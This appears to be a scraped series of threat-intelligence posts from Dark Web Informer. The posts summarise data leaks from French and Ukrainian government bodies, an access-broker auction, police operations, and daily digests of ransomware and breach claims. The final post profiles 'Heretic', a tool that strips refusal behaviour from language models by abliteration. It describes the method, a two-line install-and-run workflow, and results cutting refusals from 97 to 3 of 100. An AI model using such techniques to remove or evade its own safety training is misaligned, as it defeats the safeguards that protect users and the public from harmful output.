20, 2026 - 1:02:14 PM UTC ![France](https://flagcdn.com/20x15/fr.png)France Government / Military Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-02-20 13:02:14 UTC Threat Actor HexDex Victim Country ![France](https://flagcdn.com/20x15/fr.png)France Industry Government / Military Victim Organization Dept. of Interior / Dept. of Defense Victim Site interieur.gouv.fr / intradef.gouv.fr Category Data Leak Severity High Network Open Web Total Records 8,861 ## Incident Overview A threat actor using the handle HexDex posted a thread titled "Final Thread" leaking 8,861 unique email agent records from two French government domains: 6,129 from @interieur.gouv.fr (Department of the Interior) and 3,335 from @intradef.gouv.fr (Department of Defense). The post includes sample lines showing email and credential pairs. The threat actor describes the leak as a "final salvo" and references it as a response to another forum user. ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing French Department of Interior and Defense email agent data leak](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/63766779865601786966-1.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/63766779865601786966-1.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### French Gendarmerie Nationale Employee Data Leaked with 65,000 Records URL: https://darkwebinformer.com/french-gendarmerie-nationale-employee-data-leaked-with-65-000-records/ Last updated: 2026-02-20T17:38:58.000Z Dark Web Informer - Cyber Threat Intelligence # French Gendarmerie Nationale Employee Data Leaked with 65,000 Records February 20, 2026 - 11:15:03 AM UTC ![France](https://flagcdn.com/20x15/fr.png)France Law Enforcement / Government Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-02-20 11:15:03 UTC Threat Actor Angel\_Batista Victim Country ![France](https://flagcdn.com/20x15/fr.png)France Industry Law Enforcement / Government Victim Organization Gendarmerie Nationale Victim Site gendarmerie.interieur.gouv.fr Category Data Leak Severity High Network Open Web Total Records \~65,000 ## Incident Overview A threat actor using the handle Angel\_Batista posted on BreachForums claiming to have leaked 65,000 rows of employee data from the French Gendarmerie Nationale, sourced from gendarmerie.interieur.gouv.fr. The exposed dataset contains a wide range of fields including names, landline and mobile phone numbers, personal and professional email addresses, registration functions, domain and structure inscription details, validation timestamps, authentication credentials, mobile device information, Google Cloud and inbox alert settings, cloud connection statuses, device models, Cerbere authentication flags, OTP data, and France Connect authentication details. ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![BreachForums listing showing French Gendarmerie Nationale employee data leak](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/56453161081451068885-1.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/56453161081451068885-1.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Australian and US Authorities Seize $15M in LSD in Victoria's Largest-Ever Haul URL: https://darkwebinformer.com/australian-and-us-authorities-seize-15m-in-lsd-in-victorias-largest-ever-haul/ Last updated: 2026-02-20T16:23:38.000Z Detectives from Victoria Police's Taskforce Icarus [have charged two individuals and seized over $15 million](https://www.police.vic.gov.au/15m-worth-lsd-seized-part-joint-investigation-between-australia-and-usa) worth of LSD alongside nearly $100,000 in combined cash and cryptocurrency, following a joint investigation with US Homeland Security Investigations (HSI). The operation targeted the alleged importation, exportation, and manufacture of LSD tabs — marking the largest LSD seizure in Victorian history and believed to be one of the biggest in Australia. ## How the Investigation Unfolded The probe originated in the United States in September 2024 after HSI identified what investigators determined to be the importation of border-controlled drugs from Australia. Once the person of interest was traced to Australia, HSI referred the case to Queensland Police Service, who subsequently identified the suspects as living in Victoria. Working with the Australian Border Force, investigators intercepted approximately 120 individual postal parcels containing over 35,000 LSD tabs. These parcels were addressed to various destinations both within Australia and internationally, indicating a significant distribution network operating through the mail system. ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/2f418e218a6dc82b1227240c3b204a603f0b201d8028d0b1dde7ffbab7ddba10.webp) ## Search Warrants and Arrests With support from the Australian Federal Police, the Clandestine Laboratory Squad, the Joint Organised Crime Taskforce, and the Mornington Divisional Response Unit, search warrants were executed Wednesday morning at residential addresses in Mount Martha and Wollert. **Seized from the Mount Martha address:** - Approximately 750,000 LSD tabs - 60 grams of LSD crystal (enough to produce an estimated 600,000 additional tabs) - 113 grams of psilocybin mushrooms - 1 kg of precursor chemicals - Approximately $45,000 in cash - Approximately $50,000 in cryptocurrency The total LSD seized equates to roughly 1.5 million individual doses, with a combined street value of $15 million. ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/eac15f4c53ba98eae0acfb31e323fbeff643e1a6.webp) ## Charges Filed A 35-year-old man from Mount Martha was charged with exporting a commercial quantity of a border-controlled drug, trafficking a large commercial quantity of a drug of dependence, possessing precursors, possessing equipment and materials to manufacture drugs, and possessing proceeds of crime. He was remanded to appear at Melbourne Magistrates' Court on February 24. A 44-year-old woman from Mount Martha was charged with trafficking a large commercial quantity of a drug of dependence, possessing precursors, possessing equipment and materials to manufacture drugs, and possessing proceeds of crime. A small quantity of drugs was also seized from the Wollert address, and a 46-year-old man from Wollert is expected to be interviewed at a later date. ## Taskforce Icarus Taskforce Icarus is specifically responsible for targeting and disrupting the importation and supply of illicit drugs — primarily via the postal system. Exporting a commercial quantity of a border-controlled drug carries a maximum penalty of life imprisonment under Australian law. The investigation remains ongoing. ### Daily Dose of Dark Web Informer - February 19th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-february-19th-2026/ Last updated: 2026-02-19T23:36:57.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **42,400+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 44.2k Unique Visitors 128.6k Pageviews Last 30 days as of Feb 3, 2026\. Next update Feb 28th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) 💚 ## Support Dark Web Informer Contributions help continue monitoring threats and keeping the community informed. 🟠 MoneroXMR 89Z68A33B9sNRf941f5GczU4ZzarTQsWn6dyMVUbo6mk2zYEamh9hALH1odMiVZfynKhjKPS58ASAfDyFdTW9o29Mwf4ArZ Copied 🟡 BitcoinBTC bc1qvs4pfwascp2uln90g3e3l4agnhnjrdn2t578we Copied 🔷 EthereumETH / ERC-20 / USDT 0xbA6bCf2BF50F9789504401AFbf19E8c2CCaa773D Copied Click address to copy · ETH address accepts USDT, USDC, and other ERC-20 tokens ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Website Posts ❗️ [Alleged Data Breach of the National Bank of Ukraine Souvenir Coin Service Exposes 1.5 Million Records](https://darkwebinformer.com/alleged-data-breach-of-the-national-bank-of-ukraine-souvenir-coin-service-exposes-1-5-million-records/) FREE 📰 [INTERPOL's Operation Red Card 2.0 Nets 651 Arrests Across Africa](https://darkwebinformer.com/interpols-operation-red-card-2-0-nets-651-arrests-across-africa/) FREE X/Twitter Updates ❗️ [A threat actor is auctioning alleged access to an aviation company with $1.6 billion in revenue.](https://x.com/DarkWebInformer/status/2024501415985528890?s=20) 💡 [Ransomware Notes have been updated.](https://x.com/DarkWebInformer/status/2024506256719753630?s=20) ❗️ [A threat actor claims to be selling the database of Monedas\[.\]com, a Spanish cryptocurrency platform, along with three associated domains: beetcoins\[.\]com (English), münzen\[.\]com (German), and moedas\[.\]io (Portuguese).](https://x.com/DarkWebInformer/status/2024508831879803091?s=20) 💡 [Must be nice to have that dirty money. I prefer my activity tracker watch tbh.](https://x.com/DarkWebInformer/status/2024510432472445113?s=20) ❗️ [A threat actor is selling a compiled exploit for CVE-2026-1994 (CVSS 9.8), an unauthenticated privilege escalation via account takeover vulnerability in the WordPress s2Member plugin.](https://x.com/DarkWebInformer/status/2024513918660411507?s=20) ❗️ [Thai Petroleum & Trading Co., Ltd. has fallen victim to Gunra Ransomware](https://x.com/DarkWebInformer/status/2024518156971036881?s=20) ❗️ [A threat actor claims to be selling the database of TRA-Project, an illegal marketplace operating on both the darknet and clearnet.](https://x.com/DarkWebInformer/status/2024522868378185840?s=20) ❗️ [Alleged leak of Full BTMOB RAT Software (Malware) Collection](https://x.com/DarkWebInformer/status/2024532280987750556?s=20) ❗️ [Willow Construction LLC has fallen victim to Qilin Ransomware](https://x.com/DarkWebInformer/status/2024535677627466035?s=20) ❗️ [Kroll International has fallen victim to Qilin Ransomware](https://x.com/DarkWebInformer/status/2024536187214483461?s=20) ❗️ [A threat actor claims to have copied 25 GB of internal documents from Straumann, a Swiss dental implant and oral care company, and is sharing the data for free.](https://x.com/DarkWebInformer/status/2024538014769140060?s=20) ❗️ [Perfumerias Pigmento has fallen victim to The Gentlemen Ransomware](https://x.com/DarkWebInformer/status/2024550941949620373?s=20) ❗️ [A threat actor claims to be sharing 2.8 billion+ "fresh" (likely not) stealer logs from the ULP (Universal Log Parser) dated February 16-19, totaling 97 GB.](https://x.com/DarkWebInformer/status/2024551892072710572?s=20) ❗️ [Telecare Corporation has fallen victim to Qilin Ransomware](https://x.com/DarkWebInformer/status/2024556943315259673?s=20) 💡 [A quick overview of Linux](https://x.com/DarkWebInformer/status/2024559267676561886?s=20) 📰 [INTERPOL's Operation Red Card 2.0 Nets 651 Arrests Across Africa](https://x.com/DarkWebInformer/status/2024565634969784321?s=20) ❗️ [Kairos Ransomware Clearnet IP Leak:](https://x.com/DarkWebInformer/status/2024575231906492893?s=20) ❗️ [Five States Energy Company, LLC has fallen victim to DragonForce Ransomware](https://x.com/DarkWebInformer/status/2024580950324105341?s=20) ❗️ [cepezed has been claimed a victim to DragonForce Ransomware](https://x.com/DarkWebInformer/status/2024584615885680711?s=20) ❗️ [Alleged sale of unauthorized access to multiple U.S.-based internet service providers](https://x.com/DarkWebInformer/status/2024593026333478914?s=20) 💡 [Lol, you would be surprised how many people use this terrible platform, me included.](https://x.com/DarkWebInformer/status/2024594951279944014?s=20) ❗️ [PLAY Ransomware Claims 9 Victims](https://x.com/DarkWebInformer/status/2024597055055024459?s=20) 💡 [I added a fix to the Telegram scraper with forwarding.](https://x.com/DarkWebInformer/status/2024601029069644118?s=20) ❗️ [A threat actor is auctioning alleged access to a Chilean hotel reservation system containing 3,000 reservations with credit card data (cardholder names, card numbers, expiration dates, but no CVVs).](https://x.com/DarkWebInformer/status/2024613293315285242?s=20) ❗️ [Sinobi Ransomware Claims 4 Victims](https://x.com/DarkWebInformer/status/2024615457865470393?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### INTERPOL's Operation Red Card 2.0 Nets 651 Arrests Across Africa URL: https://darkwebinformer.com/interpols-operation-red-card-2-0-nets-651-arrests-across-africa/ Last updated: 2026-02-19T19:27:35.000Z [Law enforcement](https://www.interpol.int/News-and-Events/News/2026/Major-operation-in-Africa-targeting-online-scams-nets-651-arrests-recovers-USD-4.3-million) from 16 African countries arrested 651 individuals and recovered over $4.3 million in an eight-week cybercrime crackdown (Dec 8, 2025 – Jan 30, 2026). The operation targeted high-yield investment scams, mobile money fraud, and fraudulent loan apps. ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/3812796487963249678124698719871-2.jpg) Key results: ▪️$45M+ in financial losses linked to exposed scams ▪️1,247 victims identified ▪️2,341 devices seized ▪️1,442 malicious IPs, domains, and servers taken down ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/3812796487963249678124698719872.jpg) Notable cases: ▪️Nigeria – Dismantled an investment fraud ring using phishing, identity theft, and 1,000+ fake social media accounts. Separately, six suspects arrested for infiltrating a major telecom provider's internal platform. ▪️Kenya – 27 arrests tied to fake investment schemes using fabricated dashboards to block withdrawals. ▪️Côte d'Ivoire – 58 arrests and seizure of 240 phones, 25 laptops, and 300+ SIM cards linked to predatory mobile loan fraud. ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/3812796487963249678124698719873.jpg) ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/3812796487963249678124698719874.jpg) The operation was conducted under [INTERPOL's African Joint Operation](https://www.interpol.int/News-and-Events/News/2026/Major-operation-in-Africa-targeting-online-scams-nets-651-arrests-recovers-USD-4.3-million) against Cybercrime (AFJOC), funded by the UK's FCDO, with private sector intelligence support from Cybercrime Atlas, Team Cymru, Trend Micro, TRM Labs, and Uppsala Security. ### Alleged Data Breach of the National Bank of Ukraine Souvenir Coin Service Exposes 1.5 Million Records URL: https://darkwebinformer.com/alleged-data-breach-of-the-national-bank-of-ukraine-souvenir-coin-service-exposes-1-5-million-records/ Last updated: 2026-02-19T19:27:43.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Data Breach of the National Bank of Ukraine Souvenir Coin Service Exposes 1.5 Million Records February 19, 2026 - 6:36:41 AM UTC ![Ukraine](https://flagcdn.com/20x15/ua.png)Ukraine Banking / Government Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-02-19 06:36:41 UTC Threat Actor cyandiboo Victim Country ![Ukraine](https://flagcdn.com/20x15/ua.png)Ukraine Industry Banking / Government Victim Organization National Bank of Ukraine (NBU) Victim Site coins.bank.gov.ua Category Data Breach Severity High Network Open Web Total Records \~1.5 Million ## Incident Overview A threat actor using the handle cyandiboo posted a listing on DarkForums claiming to be selling a database from the National Bank of Ukraine's souvenir collectible coin sales service at coins.bank.gov.ua. The dataset is described as a 4 GB SQL dump updated in 2026 containing approximately 1.5 million total records across two files: a customers table with around 270,000 records including emails, phone numbers, and MD5 password hashes, and an orders table with approximately 1.2 million records containing full names, shipping addresses, phone numbers, and emails. Sample data columns visible in the listing also reference customers\_inn (tax identification numbers), customers\_passport, and bank\_id\_token fields. ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview ![Forum listing showing alleged National Bank of Ukraine database for sale](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/53052946004268783648-1.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Daily Dose of Dark Web Informer - February 18th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-february-18th-2026/ Last updated: 2026-02-18T23:18:01.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **42,400+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 44.2k Unique Visitors 128.6k Pageviews Last 30 days as of Feb 3, 2026\. Next update Feb 28th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) 💚 ## Support Dark Web Informer Contributions help continue monitoring threats and keeping the community informed. 🟠 MoneroXMR 89Z68A33B9sNRf941f5GczU4ZzarTQsWn6dyMVUbo6mk2zYEamh9hALH1odMiVZfynKhjKPS58ASAfDyFdTW9o29Mwf4ArZ Copied 🟡 BitcoinBTC bc1qvs4pfwascp2uln90g3e3l4agnhnjrdn2t578we Copied 🔷 EthereumETH / ERC-20 / USDT 0xbA6bCf2BF50F9789504401AFbf19E8c2CCaa773D Copied Click address to copy · ETH address accepts USDT, USDC, and other ERC-20 tokens ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Website Posts ❗️ [Critical RCE Vulnerability in Grandstream GXP1600 VoIP Phones Allows Root Access Without Authentication](https://darkwebinformer.com/critical-rce-vulnerability-in-grandstream-gxp1600-voip-phones-allows-root-access-without-authentication/) FREE 💡 [Heretic: Fully Automatic Censorship Removal for Language Models via Optimized Abliteration](https://darkwebinformer.com/heretic-fully-automatic-censorship-removal-for-language-models-via-optimized-abliteration/) FREE ❗️ [Alleged Auction of Domain Admin Access to Peruvian Logistics Company Worth $10 Million](https://darkwebinformer.com/alleged-auction-of-domain-admin-access-to-peruvian-logistics-company-worth-10-million/) FREE X/Twitter Updates ❗️ [A threat actor is selling an alleged Argentine database containing 51,120 PII records and 3,399 DNI records with photos, updated January 2026.](https://x.com/DarkWebInformer/status/2024145142635024860?s=20) ❗️ [A threat actor claims to be selling data from Apartamentos Hawkins, a Spanish vacation rental provider.](https://x.com/DarkWebInformer/status/2024148294574764394?s=20) ❗️ [A threat actor claims to be selling 500,000 credit card records allegedly sourced from a January 2026 breach of Capital One and Synchrony systems.](https://x.com/DarkWebInformer/status/2024153836181450908?s=20) 💡 [Ghost Security's Skills Marketplace supercharges Claude Code to be an application security expert in code security analysis, dependency/secrets scanning, and dynamic vulnerability testing](https://x.com/DarkWebInformer/status/2024155770938433541?s=20) ❗️ [A threat actor claims to be selling the database of Saraf App, an Iranian crypto and trading application.](https://x.com/DarkWebInformer/status/2024159696303571132?s=20) ❗️ [A threat actor claims to have compromised QatarEnergy LNG, a subsidiary of QatarEnergy responsible for approximately 20% of global LNG supply, based at Ras Laffan Industrial City.](https://x.com/DarkWebInformer/status/2024164249858097221?s=20) 💡 [Pro/Elite subscribers, I refreshed the Ransomware Visuals page.](https://x.com/DarkWebInformer/status/2024171289938677933?s=20) ❗️ [A threat actor claims to be selling data from a full takeover of Réglo Mobile, a French MVNO operated by E.Leclerc on the SFR network.](https://x.com/DarkWebInformer/status/2024173510931701918?s=20) ❗️ [Diversified Supply Inc. has fallen victim to Qilin Ransomware](https://x.com/DarkWebInformer/status/2024179512334815698?s=20) ❗️ [A threat actor claims to be selling data from On Air Fitness, a French gym chain, obtained via a misconfigured API proxy and missing authorization controls.](https://x.com/DarkWebInformer/status/2024182963387154818?s=20) 💡 [$3,000 Bug Bounty Delete highlight cover IDOR bug in Instagram](https://x.com/DarkWebInformer/status/2024187660223341045?s=20) ❗️ [A threat actor claims to be selling data from CFDT (Confédération Française Démocratique du Travail), one of France's main trade union confederations.](https://x.com/DarkWebInformer/status/2024205527614706073?s=20) ❗️ [Femar Group has fallen victim to Tengu Ransomware](https://x.com/DarkWebInformer/status/2024210308399768058?s=20) 💡 [Spanish Hacker Arrested for Booking Luxury Hotels at 1 Cent Per Night](https://x.com/DarkWebInformer/status/2024217296143610178?s=20) ❗️ [A threat actor claims to have exported and then deleted the MySQL databases of All Flying Services.](https://x.com/DarkWebInformer/status/2024223646416240811?s=20) ❗️ [Progress Group has fallen victim to The Gentlemen Ransomware](https://x.com/DarkWebInformer/status/2024227924967383495?s=20) ❗️ [AdMark Asia Group has fallen victim to INSOMNIA Ransomware](https://x.com/DarkWebInformer/status/2024235726204723303?s=20) 💡 [X is down again. Guess who isn't down?](https://x.com/DarkWebInformer/status/2024241653234491860?s=20) ❗️ [Application Solution Providers, Inc. has fallen victim to INSOMNIA Ransomware](https://x.com/DarkWebInformer/status/2024244282643902477?s=20) ❗️ [A threat actor claims to have leaked a partial database from the Kuwait Ministry of Finance (mof.gov.kw), originating from a 2025 Rhysida ransomware attack where the ransom was not paid.](https://x.com/DarkWebInformer/status/2024252219478909330?s=20) 💡 [Reddit has shut down r/Pragmata\_ for violating its Rule 4, which prohibits sexual or suggestive content involving minors.](https://x.com/DarkWebInformer/status/2024259128412053627?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### Alleged Auction of Domain Admin Access to Peruvian Logistics Company Worth $10 Million URL: https://darkwebinformer.com/alleged-auction-of-domain-admin-access-to-peruvian-logistics-company-worth-10-million/ Last updated: 2026-02-18T22:01:27.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Auction of Domain Admin Access to Peruvian Logistics Company Worth $10 Million February 18, 2026 - 7:39 PM UTC ![Peru](https://flagcdn.com/20x15/pe.png)Peru Logistics / Business Services Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-02-18 19:39:04 UTC Threat Actor Big-Bro Victim Country ![Peru](https://flagcdn.com/20x15/pe.png)Peru Industry Logistics / Business Services Victim Organization Unknown Victim Site Unknown Category Initial Access (Auction) Severity Medium Network Open Web Est. Revenue \~$10 Million ## Incident Overview An initial access broker using the handle Big-Bro posted an auction listing claiming to sell domain administrator access to an unidentified logistics and business services company in Peru with an estimated revenue of approximately $10 million. The listing specifies Fortinet as the access vector, indicating the initial entry point is likely through a compromised Fortinet VPN appliance. The auction starts at $1,250 with $250 step increments and a blitz price of $2,500\. The threat actor's account was registered in December 2022 with paid registration status, 90 publications, and Autogarant escrow enabled. ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview ![Forum listing showing auction for domain admin access to Peruvian logistics company](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/73284872357682358768723.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Heretic: Fully Automatic Censorship Removal for Language Models via Optimized Abliteration URL: https://darkwebinformer.com/heretic-fully-automatic-censorship-removal-for-language-models-via-optimized-abliteration/ Last updated: 2026-02-18T20:03:44.000Z Tool Spotlight LLM Research Open Source Feb 18, 2026 # Heretic: Fully Automatic Censorship Removal for Language Models via Optimized Abliteration A Python tool that removes safety alignment from transformer-based language models without expensive post-training. Combines directional ablation with TPE-based parameter optimization via Optuna to produce decensored models that rival manual expert abliterations — in about 45 minutes on an RTX 3090. p-e-w / heretic Fully automatic censorship removal for language models Python 100% ★ 7.9k stars v1.0.1 AGPL-3.0 799 forks 114 commits 14 contributors Abliteration — the technique of removing safety alignment from language models by identifying and suppressing "refusal directions" in transformer weight matrices — has been around since Arditi et al.'s 2024 paper. But until now, doing it well required understanding transformer internals and manually tuning parameters. **Heretic**, by Philipp Emanuel Weidmann, makes the process fully automatic. The tool implements a parametrized variant of directional ablation combined with a TPE (Tree-structured Parzen Estimator) optimizer powered by Optuna. It co-minimizes two objectives: the number of refusals on "harmful" prompts and the KL divergence from the original model on "harmless" prompts. The result is a decensored model that refuses less while retaining as much of the original model's intelligence as possible. ![Heretic terminal output showing optimization progress and refusal reduction](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/heretic_2843590235872385796283975.png) ## // How It Works Load model → Benchmark hardware → Compute refusal directions → TPE optimization → Ablate weights → Save / Upload / Chat For each supported transformer component (attention out-projection and MLP down-projection), Heretic identifies the associated matrices in each layer and orthogonalizes them with respect to the computed "refusal direction." Refusal directions are calculated as a difference-of-means between first-token residuals for harmful and harmless example prompts. The ablation process is controlled by several optimizable parameters that define the shape of an ablation weight kernel across layers: `max_weight`, `max_weight_position`, `min_weight`, and `min_weight_distance`. Rather than applying uniform ablation across all layers (as simpler implementations do), Heretic optimizes a flexible weight curve that applies different strengths at different layers. ![Diagram showing ablation weight kernel shape across transformer layers](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/heretic_2843590235872385796283976.png) ## // What Makes It Different 🎯 Fully Automatic No understanding of transformer internals required. Install, point at a model, run. Optuna handles parameter search. 📐 Flexible Weight Kernel Non-constant ablation weights across layers, optimized per-run. Different strengths for attention vs. MLP components. 🔀 Interpolated Directions Refusal direction index is a float, not an integer. Linearly interpolates between nearest vectors, unlocking directions beyond individual layers. ⚖️ Dual Optimization Co-minimizes refusals and KL divergence simultaneously. Maximizes compliance while minimizing damage to model intelligence. ## // Benchmark Results The README includes a comparison on Gemma 3 12B Instruct that demonstrates the approach. All abliterated models achieve the same refusal suppression (3/100 refusals vs. 97/100 for the original), but differ significantly in how much they diverge from the original model's behavior on harmless prompts: | Model | Refusals (of 100) | KL Divergence | | -------------------------------------- | ----------------- | ------------- | | gemma-3-12b-it (original) | 97 | 0 (baseline) | | mlabonne/gemma-3-12b-it-abliterated-v2 | 3 | 1.04 | | huihui-ai/gemma-3-12b-it-abliterated | 3 | 0.45 | | **p-e-w/gemma-3-12b-it-heretic** | **3** | **0.16** | The Heretic version achieves the same 3/100 refusal rate as manually-tuned abliterations, but at a KL divergence of 0.16 — roughly one-third of the next best result and one-sixth of the established mlabonne abliteration. Lower KL divergence means less damage to the model's general capabilities. These results were generated with default settings and no human intervention. ## // Usage The tool is designed to be as simple as possible. With Python 3.10+ and PyTorch 2.2+ installed: pip install heretic-llm → heretic Qwen/Qwen3-4B → \~45 min on RTX 3090 → Save / Upload / Chat Heretic benchmarks the system at startup to determine optimal batch size. After processing, it offers to save the model locally, upload to Hugging Face, or open an interactive chat session for testing. A collection of pre-made models is available on Hugging Face under the "The Bestiary" collection. ## // Model Compatibility 📋 Supported Architectures Heretic supports most dense transformer models including many multimodal models and several MoE architectures. It does not yet support SSMs/hybrid models, models with inhomogeneous layers, or certain novel attention systems. ## // Considerations ⚠️ Dual-Use Nature Heretic explicitly removes safety alignment from language models. This has legitimate research and free expression applications, but also lowers barriers to generating harmful content. The tool's existence and rapid adoption (7.9k stars) reflects ongoing tension in the AI community between safety alignment and open access. **Hardware requirements.** Decensoring requires loading the full model into GPU memory for the optimization process. Larger models (70B+) will require multi-GPU setups or quantization approaches. The \~45 minute benchmark is for an 8B model on an RTX 3090. **Quality variability.** Results depend on the base model architecture, the prompt datasets used for computing refusal directions, and how the original model was safety-tuned. The Gemma 3 12B results are strong, but performance may vary across different model families. **AGPL-3.0 license.** The tool is licensed under the GNU Affero General Public License v3.0, which requires that any modifications or derivative works be released under the same license. This is a strong copyleft license that has implications for commercial use. **Evaluation limitations.** The refusal and KL divergence metrics provide useful signal but don't capture everything. A model that passes these metrics could still have subtle capability degradation, or conversely, could still refuse in ways not captured by the test prompts. ## // Bottom Line Heretic represents a significant step in abliteration tooling. The combination of fully automatic operation, TPE-based parameter optimization, flexible weight kernels, and interpolated refusal directions produces results that match or exceed manual expert work — with zero human effort. The two-line install-and-run workflow makes it accessible to anyone who can use a command line. The 7.9k stars and 799 forks in a short period reflect strong demand for this kind of tooling. Whether you view that as a win for open research and user autonomy or a concern for AI safety depends on where you sit in the alignment debate. Either way, Heretic is a technically impressive tool that's worth understanding. [ GitHub Repository](https://github.com/p-e-w/heretic) [ The Bestiary (HuggingFace)](https://huggingface.co/collections/p-e-w/the-bestiary) This post is for informational purposes only. Removing safety alignment from language models carries ethical and legal implications. Users are responsible for how they use decensored models. ### Critical RCE Vulnerability in Grandstream GXP1600 